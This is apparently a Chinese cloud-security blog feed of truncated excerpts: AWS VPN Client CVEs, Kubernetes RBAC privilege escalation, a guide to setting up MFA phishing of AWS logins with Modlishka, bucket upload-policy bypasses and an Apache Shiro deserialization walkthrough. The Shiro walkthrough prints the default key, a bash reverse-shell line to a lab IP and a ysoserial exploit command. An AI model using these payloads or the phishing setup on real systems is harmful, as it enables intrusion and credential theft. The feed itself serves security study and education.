在 Amazon AWS VPN Client 2.0.0 中发现了一个问题。在验证 VPN 配置文件期间存在 TOCTOU 竞争条件。这允许在 AWS VPN Client 服务(作为 SYSTEM 运行)处理文件之前将 AWS VPN Client 允许参数列表之外的参数注入到配置文件中。低级用户(例如 log)可以注入危险的参数,这将导致可在日志文件中写入任意内容。
CVE-2022-25165:UNC 路径导致信息泄露
在为指令(如 "auth-user-pass")引用文件路径时,可以在OpenVPN配置文件中包含一个UNC路径。当此文件被导入 AWS VPN 客户端并且客户端尝试验证文件路径时,它会在路径上执行打开操作并将用户的 Net-NTLMv2 哈希泄漏给外部服务器。
AWS VPN客户端介绍
AWS VPN Client 是一个桌面应用程序,可用于连接到 AWS Client VPN。
官网网站介绍为:
AWS Client VPN 的客户端是免费的。您可以将您的计算机直接连接到 AWS Client VPN 以获得端到端的 VPN 体验。该软件客户端与 AWS Client VPN 的所有功能兼容。
复现:任意文件写入漏洞
AWS VPN 客户端安装一个 Windows 服务,以管理员身份运行,充当自定义 OpenVPN 客户端可执行文件的包装器。低权限用户可以使用 AWS VPN 客户端尝试使用导入的 OpenVPN 配置文件连接到 VPN。
有一些已知的危险 OpenVPN 指令会在 VPN 连
2022年6月17日 11:50火线zone
存储桶上传策略和签名 URL的绕过及利用
https://zone.huoxian.cn/d/1262-url
在AWS上使用MFA钓鱼用户
https://zone.huoxian.cn/d/1263-awsmfa
K8s提权之RBAC权限滥用
https://zone.huoxian.cn/d/1264-k8srbac
云原生时代来临,云安全技术将何去何从?
https://www.aqniu.com/industry/84650.html
Cloud I Hack into Google Cloud
https://mp.weixin.qq.com/s/qXYkarSVVTpYLx9zwt0UjA
4 个云应用安全最佳实践
https://securityboulevard.com/2022/06/4-cloud-application-security-best-practices/
使用 HashiCorp Vault 保护 Kubernetes 的敏感信息
https://www.infracloud.io/blogs/kubernetes-secrets-hashicorp-vault/
在 AWS 中,将支持 MFA 的 IAM 用户与 IAM 角色进行关联,以实现潜在的权限升级
https://www.praetorian.com/blog/stsgetsessiontoken-role-chaining-in-aws/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月16日 17:50火线zone
在K8s中RBAC是常用的授权模式,如果在配置RBAC时分配了“过大”资源对象访问权限可导致权限滥用来提权,以至于攻击者扩大战果,渗透集群。
如下是一些RBAC相关的笔记。
k8s的RBAC
RBAC - 基于角色的访问控制。
RBAC使用rbac.authorization.k8s.io API Group 来实现授权决策,允许管理员通过 Kubernetes API 动态配置策略,要启用RBAC,需要在 apiserver 中添加参数--authorization-mode=RBAC,如果使用的kubeadm安装的集群,1.6 版本以上的都默认开启了RBAC:
cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep "authorization-mode"

RBAC相关对象
K8s所有的资源对象都是模型化的API对象,允许执行CRUD,RBAC也有相关API对象,像Role、ClusterRole对象都是K8s内部的 API 资源,可以使用kubectl相关的命令来进行操作:
Role 和 ClusterRole:角色和集群角色,这两个对象都包含上面的 Rules 元素,二者的区别在于,在 Role 中,定义的规则只适用于单个命名空间,也就是和 namespace 关联的,而 ClusterRole 是集群范围内的,因此定义的规则不受命名空间的约束。
RoleBinding 和 ClusterRoleBinding:角色绑定和集群角色绑定,简单来说就是把声明的 Subject 和我们的 Role 进行绑定的过程(给某个用户绑定上操作的权限),二者的区别也是作用范围的区别:RoleBinding 只会影响到当前 namespace 下面的资源操作权限,而 ClusterRoleBinding 会影响到所有的 namespace。
举一些RBAC使用的例子。
创建一个只能访问固定namespace的的hx用户
1.新创建一个用户凭证
给hx用户创建一个私钥:
openssl genrsa -out hx.key 2048
再使用这个私钥创建一个证书签名请求文件,-subj参数后是用户名和组(CN表示用户名,O表示组):
openssl req -new -key hx.key -out hx.csr -subj "/CN=hx/O=huoxian"
然后
2022年6月16日 17:20火线zone
本文为译文,原为链接为:https://rhinosecuritylabs.com/aws/mfa-phishing-on-aws/
网络钓鱼和MFA
社会工程是恶意攻击者未经授权访问其目标环境的最常见方式之一。它利用了所有公司最薄弱的点——人的因素。通常情况下,如果目标正在使用多因素认证(MFA),网络钓鱼活动就会失败。然而,随着防御变得越来越复杂,攻击者及其方法也越来越复杂,这使得 MFA 几乎没有那么有效。
本博客将介绍不同的开源选项,以帮助针对使用 MFA 的目标和网站执行网络钓鱼攻击。对于这篇文章,我们将针对 AWS IAM 用户登录,启用(和不启用)MFA 来演示这个概念。我们选择使用 AWS 作为示例的另一个原因是,据我们所知,之前没有发布过关于钓鱼 AWS 用户的研究,而 Rhino 的团队已经在内部使用了一段时间。
MFA 网络钓鱼工具
有一些很棒的开源工具可用于执行 MFA 网络钓鱼活动,例如Evilginx2、Modlishka、Muraena和CredSniper。大多数工具都是在客户端和攻击者运行的服务器之间充当代理。当攻击目标连接攻击者的服务器时,这个工具将充当受害人和攻击者的钓鱼网站的中间人,以此攻击者可以向受害者提供有效的、动态的、看起来合法的网络钓鱼页面,同时拦截正在进行的任何通信(例如登录)。
到目前为止,这些工具都没有 AWS 模板或与 AWS 相关的任何东西,因此我们决定使用 AWS 作为本文的概念验证目标网站。我们选择在这篇文章中使用 Modlishka,因为它易于设置和配置,并且在多域流量的透明代理方面做得很好。
网络钓鱼基础设施的设置
基础设备
使用带有通配符的DNS来创建一个虚拟子域,并为钓鱼页面的登录界面配置一个域名(例如“example.com”)。
配置相关证书(例如:"*.example.com"),可以通过Let's Encrypt获得。
运行该工具的服务器(公开可访问,开放80和443端口)。
服务器上安装了go语言环境。
有关为您的域设置的 DNS 记录以及如何生成通配符 SSL 证书的简短演练,您可以查看GitHub 上的 Modlishka wiki。
Modlishka 配置
要下载 Modlishka 源,您可以运行以下命令:
go get -u github.com/drk1wi/Modlishka
在编译 Modlishka 之前,我们对源
2022年6月16日 12:20火线zone
本文中带有自己一些拙见,读者若存在相关问题或者有其他想法的,欢迎在评论区交流探讨。原文:https://labs.detectify.com/2018/08/02/bypassing-exploiting-bucket-upload-policies-signed-urls/
存储桶上传策略是一种直接从客户端将数据上传到存储桶的便捷方式。通过上传策略中的规则和与某些文件访问场景相关的逻辑,我们如何越权访问到完整的存储桶对象列表,同时能够修改或删除存储桶中的现有文件。
什么是存储桶策略?
(如果你已经知道什么是桶策略和签名 URL,你可以直接跳到下面的利用章节)
存储桶策略旨在将内容直接上传到基于云的存储桶存储(如 Google Cloud Storage 或 AWS S3)的安全方式。管理者只需要创建一个定义允许和不允许的策略,然后使用密钥对策略进行签名,并将策略和签名提供给客户端,接着客户端可以直接将文件上传到存储桶,存储桶将验证上传的内容是否符合策略。如果符合,则文件将被上传。
上传策略与预签名 URL
在开始之前,我们需要明确一点,有多种方法可以访问存储桶中的对象。POST 策略 (AWS)和 POST 对象 (Google Cloud Storage) 方法只允许上传内容,使用 POST 请求到存储桶。
另一种称为预签名 URL (AWS) 或 签名 URL (Google Cloud Storage) 的方法不仅允许修改对象。根据预签名逻辑定义的 HTTP 方法,我们可以PUT、DELETE或GET对象,这些对象默认为私有。
与 POST 策略版本相比,预签名 URL 在定义内容类型、访问控制以及类似上传文件方面更为宽松。签名 URL 也更经常使用不完善的自定义逻辑来实现,如下所示:
还有更多允许某人访问上传内容的方法,一种 是类似于 POST 策略的AWS STS AssumeRoleWithWebIdentity ,不同之处在于您可以获取由预定义的 IAM 角色创建的临时安全凭证 (ASIA * )。
如何发现上传策略或签名URL?
这是使用 POST 的上传的请求包截图:

由上图可发现,该策略是一个 base64 编码的 JSON,如下所示:
{ "expiration": "2018-07-31T13:55:50Z", "conditions": [ {"bucket": "bucket-na
2022年6月16日 11:50火线zone
ServerLess Aws Lambda攻击与横向方法研究
https://www.anquanke.com/post/id/274143
从云服务器 SSRF 漏洞到接管你的阿里云控制台
https://www.anquanke.com/post/id/274073
Terraform 使用入门以及在云上攻防中的作用
https://xz.aliyun.com/t/11440
如何使用k0otkit对Kubernetes集群进行渗透测试
https://www.freebuf.com/articles/container/335941.html
平台工程中的十大谬论
https://www.cncf.io/blog/2022/06/15/the-top-10-fallacies-in-platform-engineering/
平台团队规模化运营 Kubernetes 的六个要点
https://containerjournal.com/features/six-keys-for-platform-teams-to-operate-kubernetes-at-scale/
在 Follina 和 Azure 问题之后,对微软漏洞做法的争论不断
https://therecord.media/debate-rages-over-microsoft-vulnerability-practices-after-follina-azure-issues/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年6月15日 14:41火线zone
Apache Shiro是常见的Java安全框架,执行身份验证、授权、密码和会话管理。Shiro组件漏洞主要分为两种类型,一种是java反序列化造成的远程代码执行漏洞,另一种是身份验证绕过漏洞。
在官方对rememberMe字段反序列化进行秘钥随机化,AES加密模式更换后,暂无新型反序列化漏洞的出现。但是在身份验证绕过的补丁修复上,多次出现绕过情况,多是由于补丁修复过程中考虑不周全。
只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都可能会导致该漏洞的产生.硬编码是将数据直接嵌入到程序或其他可执行对象的源代码中。如果在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,那么就可能存在此漏洞。
shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操作。
服务器端识别身份解密处理cookie的流程则是:获取rememberMe cookie ->base64 解码->AES解密(加密密钥硬编码)->反序列化(未作过滤处理)。
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
漏洞原理:Shiro1.2.4之前版本中使用的是硬编码。其默认密钥的base64编码后的值为:kPH+bIxk5D2deZiIxcaaaA==
影响版本:Apache Shiro <= 1.2.4
Vulhub - Docker-Compose file for vulnerability environment
访问存在漏洞的网站,勾选Remenber me,输入账号:admin密码:vulhub
ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
将反弹命令” bash -i >& /dev/tcp/192.168.31.74/3333 0>&1 “base64加密填在下面的命令中,执行
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 7777 CommonsBeanutils1 'bash -c {echo,YmFzaCAtaS